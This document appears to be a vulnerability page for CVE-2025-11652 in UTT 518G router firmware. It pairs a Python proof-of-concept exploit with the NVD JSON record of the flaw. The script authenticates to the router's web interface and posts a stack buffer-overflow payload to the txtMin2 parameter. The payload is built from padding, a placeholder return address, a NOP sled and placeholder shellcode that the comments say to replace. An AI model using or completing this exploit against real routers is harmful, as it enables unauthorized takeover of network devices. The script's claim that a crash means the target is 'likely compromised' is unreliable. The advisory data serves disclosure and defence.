CVE-2025-11652

#!/usr/bin/env python3 # CVE-2025-11652 - UTT 518G Buffer Overflow PoC # Target: /goform/formTaskEdit_ap parameter txtMin2 # Author: Security Researcher import requests import sys TARGET_URL = "http://TARGET_HOST" LOGIN_URL = f"{TARGET_URL}/goform/login" EXPLOIT_URL = f"{TARGET_URL}/goform/formTaskEdit_ap" # Credentials (low privilege account required) USERNAME = "user" PASSWORD = "password" def login(session, base_url): """Authenticate to the router web interface""" login_data = { "username": USERNAME, "password": PASSWORD, "submit": "Login" } resp = session.post(f"{base_url}/goform/login", data=login_data) return resp.status_code == 200 def exploit(session, base_url, payload): """Send buffer overflow payload via txtMin2 parameter""" data = { "txtMin2": payload, # Additional form parameters as needed } try: resp = session.post(f"{base_url}/goform/formTaskEdit_ap", data=data, timeout=10) return resp except requests.exceptions.RequestException as e: print(f"[+] Target may have crashed (expected): {e}") return None def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] base_url = f"http://{target}" # Construct overflow payload (adjust offset as needed) # Typical buffer size ~256 bytes; adjust based on firmware analysis offset = 256 # NOP sled + shellcode placeholder nop_sled = b"\x90" * 16 # Replace with actual shellcode for target architecture (MIPS/ARM) shellcode = b"\xcc" * 64 # Return address (little-endian, adjust based on stack analysis) ret_addr = b"\x41\x41\x41\x41" payload = b"A" * offset + ret_addr + nop_sled + shellcode session = requests.Session() print(f"[*] Authenticating to {target}...") if not login(session, base_url): print("[-] Login failed. Check credentials.") sys.exit(1) print("[+] Authentication successful") print(f"[*] Sending buffer overflow payload to txtMin2...") result = exploit(session, base_url, payload) if result is None: print("[+] Exploit completed - target likely compromised") else: print(f"[*] Response status: {result.status_code}") print("[+] Exploit sent successfully") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11652", "sourceIdentifier": "[email protected]", "published": "2025-10-13T01:15:47.957", "lastModified": "2026-01-08T17:59:14.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in UTT 进取 518G up to V3v3.2.7-210919-161313. This issue affects some unknown processing of the file /goform/formTaskEdit_ap. The manipulation of the argument txtMin2 results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.7-210919-161313", "matchCriteriaId": "9D83D3FD-34F4-4FBE-A83A-99AA21B91450"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BADC9D6-20DE-466B-AEC1-278B8CC49BEC"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/14.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328069", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328069", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664926", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}